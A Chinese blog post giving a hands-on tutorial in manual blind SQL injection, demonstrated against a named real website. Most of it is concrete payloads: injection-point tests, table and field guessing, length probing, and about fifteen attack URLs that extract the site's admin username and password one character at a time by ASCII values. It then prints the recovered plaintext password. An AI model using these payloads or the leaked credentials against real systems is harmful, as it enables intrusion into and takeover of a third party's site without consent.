实战演示手工SQL注入之半猜解查询

第一步:判断环境,寻找注入点

确定注入点 : 
数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 




第二步:猜解表名:

and exists (select * from 表名),如果存在该表名,返回正常,不存在返回错误;


第三步:猜解字段

and exists (selsect 字段名 from 表名)



第四步:猜解字段长度(即猜解账号密码位数)

and (selsect top 1 len(字段名 )from 表名)>0(从0开始依次随意递增,直到页面显示不正常,最后用等=确定位数)


mysql测试失败,原因暂时不知;

第五步:折半法猜出--重要关键的一环      猜密码   =0
and (select top 1 asc(mid(字段,1,1)) from 表名)>0    

and(select top 1 asc(mid(admin_name,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,1,1))from admin)=97
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,2,1))from admin)=100
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,3,1))from admin)=109
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,4,1))from admin)=105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,5,1))from admin)=110

97,100,109,105,110     用户名:admin     密码:liuguoping


and(select top 1 asc(mid(admin_pass,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,1,1))from admin)=108
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,2,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,3,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,4,1))from admin)>103
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,5,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,6,1))from admin)>111
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,7,1))from admin)>112
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,8,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,9,1))from admin)>110
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,10,1))from admin)>103

108,105,117,103,117,111,112,105,110,103     



猜解第N位的ASCII码 >0取值从负数到正数都有可能,当然常见的密码都是数字加字母的组合,他们的ASCII值在0-128之间,将值替换为这之间的值,如果正确,则返回正常页面,如果不是责返回出错,将正确的ASCII码放入ASCII转换器中转成十进制字符将N分别替换为 1 2 3 4 ...     反复猜解即可得出字段每一个位数的值而得到密码 。

第六步:用工具转码工具,把ASCII转换成字符。 


阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页